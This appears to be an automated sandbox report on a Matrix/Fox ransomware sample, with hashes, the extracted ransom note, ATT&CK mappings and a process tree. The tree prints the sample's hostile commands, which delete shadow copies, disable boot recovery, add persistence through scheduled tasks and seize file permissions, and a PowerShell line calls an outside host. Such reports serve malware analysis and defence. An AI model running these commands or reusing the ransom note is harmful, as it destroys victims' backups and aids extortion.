Overview

overview

10

Static

static

3

FoxRansomw...65.exe

windows7-x64

10

FoxRansomw...65.exe

windows10-2004-x64

10

FoxRansomw...a7.exe

windows7-x64

10

FoxRansomw...a7.exe

windows10-2004-x64

10

FoxRansomw...20.exe

windows7-x64

10

FoxRansomw...20.exe

windows10-2004-x64

10

FoxRansomw...0b.exe

windows7-x64

10

FoxRansomw...0b.exe

windows10-2004-x64

10

FoxRansomw...53.exe

windows7-x64

10

FoxRansomw...53.exe

windows10-2004-x64

10

FoxRansomw...b1.exe

windows7-x64

10

FoxRansomw...b1.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    13-02-2024 05:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

  • Size

    1.2MB

  • MD5

    1fa1b6d4b3ed867c1d4baffc77417611

  • SHA1

    afb5e385f9cc8910d7a970b6c32b8d79295579da

  • SHA256

    91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53

  • SHA512

    0600b92914a7489a6428b8e4217e5f24e1d149fc5807d86cc4de91b43be2470a1ddf77093c8732d4371a87fd163cc556e09d11a2c6655382a35a5f5741ae05a5

  • SSDEEP

    24576:K/SA+2lraRrjSJR5ezmT1dM9bBkNIDreFqO:2Xl9Ife

Score
10/10
matrixdiscoveryevasionpersistenceransomwarespywarestealerupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\1033\14\#FOX_README#.rtf

Ransom Note
{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected] \par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 1E69277169CC205F\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 1E69277169CC205F\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 taxmWs4p\cf0\f1\fs32\lang1049\par \par }
Emails
URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

    ransomwarematrix
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 11 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops desktop.ini file(s) 43 IoCs
  • Enumerates connected drives 3 TTPs 44 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
    "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe"
    1⤵
    • Matrix Ransomware
    • Loads dropped DLL
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1648
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWKkLa9n.exe"
      2⤵
        PID:2404
      • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWKkLa9n.exe
        "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWKkLa9n.exe" -n
        2⤵
        • Executes dropped EXE
        PID:2700
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XrqahlQb.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2920
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3024
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\OsRNBNcX.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1584
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\OsRNBNcX.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:1912
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:696
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
              PID:548
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\EQHMlr5B.vbs"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:700
            • C:\Windows\SysWOW64\wscript.exe
              wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\EQHMlr5B.vbs"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1108
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\AAgZ7an1.bat" /sc minute /mo 5 /RL HIGHEST /F
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1768
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\AAgZ7an1.bat" /sc minute /mo 5 /RL HIGHEST /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:2612
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
                4⤵
                  PID:2396
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /Run /I /tn DSHCA
                    5⤵
                      PID:2680
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\F4W1lmNX.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1704
                • C:\Windows\SysWOW64\attrib.exe
                  attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
                  3⤵
                  • Views/modifies file attributes
                  PID:2588
                • C:\Windows\SysWOW64\cacls.exe
                  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
                  3⤵
                    PID:2088
                  • C:\Windows\SysWOW64\takeown.exe
                    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
                    3⤵
                    • Modifies file permissions
                    PID:2552
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c gbw8Tp4V.exe -accepteula "SignHere.pdf" -nobanner
                    3⤵
                    • Loads dropped DLL
                    PID:1020
                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\gbw8Tp4V.exe
                      gbw8Tp4V.exe -accepteula "SignHere.pdf" -nobanner
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:1192
                      • C:\Users\Admin\AppData\Local\Temp\gbw8Tp4V64.exe
                        gbw8Tp4V.exe -accepteula "SignHere.pdf" -nobanner
                        5⤵
                        • Drops file in Drivers directory
                        • Sets service image path in registry
                        • Executes dropped EXE
                        • Enumerates connected drives
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: LoadsDriver
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1636
                        • C:\Windows\system32\WerFault.exe
                          C:\Windows\system32\WerFault.exe -u -p 1636 -s 228
                          6⤵
                          • Loads dropped DLL
                          PID:2876
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {4F3647FA-9122-40C4-94CD-2BF27217A82E} S-1-5-21-452311807-3713411997-1028535425-1000:OZEMQECW\Admin:Interactive:[1]
                1⤵
                  PID:2844
                  • C:\Windows\SYSTEM32\cmd.exe
                    C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\AAgZ7an1.bat"
                    2⤵
                      PID:1804
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin Delete Shadows /All /Quiet
                        3⤵
                        • Interacts with shadow copies
                        PID:2740
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic SHADOWCOPY DELETE
                        3⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3812
                      • C:\Windows\system32\bcdedit.exe
                        bcdedit /set {default} recoveryenabled No
                        3⤵
                        • Modifies boot configuration data using bcdedit
                        PID:3292
                      • C:\Windows\system32\bcdedit.exe
                        bcdedit /set {default} bootstatuspolicy ignoreallfailures
                        3⤵
                        • Modifies boot configuration data using bcdedit
                        PID:3468
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Delete /TN DSHCA /F
                        3⤵
                          PID:2368
                    • C:\Windows\system32\vssvc.exe
                      C:\Windows\system32\vssvc.exe
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2760

                    Network

                    MITRE ATT&CK Enterprise v15

                    Reconnaissance

                    Resource Development

                    Initial Access

                    Execution

                    Scheduled Task/Job

                    1
                    T1053

                    Persistence

                    Boot or Logon Autostart Execution

                    1
                    T1547

                    Registry Run Keys / Startup Folder

                    1
                    T1547.001

                    Scheduled Task/Job

                    1
                    T1053

                    Privilege Escalation

                    Boot or Logon Autostart Execution

                    1
                    T1547

                    Registry Run Keys / Startup Folder

                    1
                    T1547.001

                    Scheduled Task/Job

                    1
                    T1053

                    Defense Evasion

                    File and Directory Permissions Modification

                    1
                    T1222

                    Hide Artifacts

                    1
                    T1564

                    Hidden Files and Directories

                    1
                    T1564.001

                    Indicator Removal

                    2
                    T1070

                    File Deletion

                    2
                    T1070.004

                    Modify Registry

                    2
                    T1112

                    Credential Access

                    Unsecured Credentials

                    1
                    T1552

                    Credentials In Files

                    1
                    T1552.001

                    Discovery

                    Peripheral Device Discovery

                    1
                    T1120

                    Query Registry

                    2
                    T1012

                    System Information Discovery

                    2
                    T1082

                    Lateral Movement

                    Collection

                    Data from Local System

                    1
                    T1005

                    Command and Control

                    Exfiltration

                    Impact

                    Defacement

                    1
                    T1491

                    Inhibit System Recovery

                    3
                    T1490

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\$Recycle.Bin\S-1-5-21-452311807-3713411997-1028535425-1000\desktop.ini
                      Filesize

                      1KB

                      MD5

                      092a0c3ba49e0edf0ee57428ea4c9d4e

                      SHA1

                      36773f1d399341ef5316f51a534e29337581d941

                      SHA256

                      af913fb1d2b33d4f301a5cf285374ae71d4c1ae4cb37f26ee9cca53f1938e820

                      SHA512

                      701239651b4f9b70700544173d4fcdcf2e35ca75b709c77e84c306e96687df47bb2f95810489d20ceb234f0b9b85799623e80f58fd6fbb43a1e3481dd48b0e73

                      Download Submit

                    • C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\1033\14\#FOX_README#.rtf
                      Filesize

                      8KB

                      MD5

                      780d8192b96ace15d3efce43ab816529

                      SHA1

                      f5a2b684129fd1c6fd0c935a5a7277d21ae13633

                      SHA256

                      217b3a7d6f00a0ab7e0eaf0e650e362d185e91a17589126d834c5993fafd5894

                      SHA512

                      08d4601ea9f8e83f03f3fc3cc4ebffefff1b8e6b790684878e9ad9351ce23e86307b5388a8d5abc2c737f1c28168d51a56ec746627c24ee65a6ffcd0d21f517e

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\F4W1lmNX.bat
                      Filesize

                      246B

                      MD5

                      f590beb1d601fcc601324badef6ea53a

                      SHA1

                      7c33634f6ba9c10ec688d237cd2a965e3963ce4d

                      SHA256

                      8325ed341a5baf675fcea6de9d2ac76e855d045e13fbc17deb4ebc8973b4a2c0

                      SHA512

                      74e6e6f1c1975a9a642d02adc6f439901691e34bfafe350150ba1bed2940ac938f66462c7f2d1e3d7ae31aa978cdda5ab2167a3ecdf3227d1a410c3a795c4c8d

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XrqahlQb.txt
                      Filesize

                      14B

                      MD5

                      c74dacdd9331a6698efffe81ff66ac08

                      SHA1

                      79e8ce4bb5cc2436e95fad4a74a31aee7aa63043

                      SHA256

                      82ad297f8577dd8f868d0068e253c3d6b61a1e332d7038ed18d23da65b03ad6c

                      SHA512

                      24620715fb4e07f73db38962b2f95b77396d09a65f153c138f4d873e7f83f9cc72a16423ce2af745f8a04d1e657dfa7d9136ec3fd9ff5794b385ec33edae89da

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_1E69277169CC205F.txt
                      Filesize

                      8KB

                      MD5

                      4c85e6ca19d25990f2744ae97c81a2a2

                      SHA1

                      d3258985d11accfb8b0978c4fbe4e2104e69f67a

                      SHA256

                      16de82d85493b825bb17a4f5429f22b2ad4a5acb67cd4d1b5ee36108e4f243dc

                      SHA512

                      67f483e0dbddda903ca7f20f16fc5d12939ad27ea991fe68438dedd04cb8f361f4e1fc5073e7549469cd67b5a6cb991d5744642072b28c3e0930fe52f99ad46e

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_1E69277169CC205F.txt
                      Filesize

                      899B

                      MD5

                      9faa44ab1100f2956d182f2fa345555c

                      SHA1

                      9cfe97f8180ced4e128e1b0dee9ce0297f75ee79

                      SHA256

                      9782996fdb8f76c1ddcfd48720ececdc5ae242fa04f245e1f6093a1eb0ba3cce

                      SHA512

                      816491988177dc6a40b71d8a12e009afda30f45f10ad40ec64ffdb0eba5eab5e6e82c7ce00e2581f5593d6552bec224aa60663f51b71480f29a6704df0bf61ad

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_1E69277169CC205F.txt
                      Filesize

                      32KB

                      MD5

                      3334fe971a38a2e24d0dd07f10735d9b

                      SHA1

                      0735dc005a3c289d10e3b12af2e42a2b6cd69423

                      SHA256

                      c69fefa54463e5c56a9fdf5c07d9c4a933c0516cf76ae64b94df2b1a01b61665

                      SHA512

                      3ea2274dbec4e982eac34fc02d85703a2d44f93ed09ffe4e55d2b2626985c72af4865fc9a8651a35babf55777d17d7bac851d4496b04caea92ed50da3f6e6b34

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\gbw8Tp4V.exe
                      Filesize

                      181KB

                      MD5

                      2f5b509929165fc13ceab9393c3b911d

                      SHA1

                      b016316132a6a277c5d8a4d7f3d6e2c769984052

                      SHA256

                      0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                      SHA512

                      c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                      Download Submit

                    • C:\Users\Admin\AppData\Roaming\AAgZ7an1.bat
                      Filesize

                      265B

                      MD5

                      feb8a00c6ca3576a6baa82c437dabd4a

                      SHA1

                      ac3f91ac4a809c7ca02a38852996c28bd67e9de6

                      SHA256

                      8a93f58babe9638cd80e0367051f4a58fd90264270568fdc9239c6e4f80669e7

                      SHA512

                      07bb8c8045eea85dee3b46932a8b3c65da363f925848e1e5c5a02c0c99ada5ba849184ac2f8a80958eb09a1894e1c71f4deb80cd995414dff70f9fd588f7f969

                      Download Submit

                    • C:\Users\Admin\AppData\Roaming\EQHMlr5B.vbs
                      Filesize

                      260B

                      MD5

                      53c495bdab4d6bfb1e1c0e3377634ff9

                      SHA1

                      d22b4dd3f600b3a40848a1d8a74c069d6572bc39

                      SHA256

                      c301cbcc22e73ade210c30c857cd100cd335c7be81bef26f4294842c8ed0f046

                      SHA512

                      24f78511f7572735ad6b072509e4e9bbfd59e8bf8ead7656d459a6a2a50843320ec038b22a0fab419bdfab1304d63b4f00ee078720811c32108b90ad8566a4c1

                      Download Submit

                    • \Users\Admin\AppData\Local\Temp\FoxRansomware\NWKkLa9n.exe
                      Filesize

                      1.2MB

                      MD5

                      1fa1b6d4b3ed867c1d4baffc77417611

                      SHA1

                      afb5e385f9cc8910d7a970b6c32b8d79295579da

                      SHA256

                      91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53

                      SHA512

                      0600b92914a7489a6428b8e4217e5f24e1d149fc5807d86cc4de91b43be2470a1ddf77093c8732d4371a87fd163cc556e09d11a2c6655382a35a5f5741ae05a5

                      Download Submit

                    • \Users\Admin\AppData\Local\Temp\gbw8Tp4V64.exe
                      Filesize

                      221KB

                      MD5

                      3026bc2448763d5a9862d864b97288ff

                      SHA1

                      7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                      SHA256

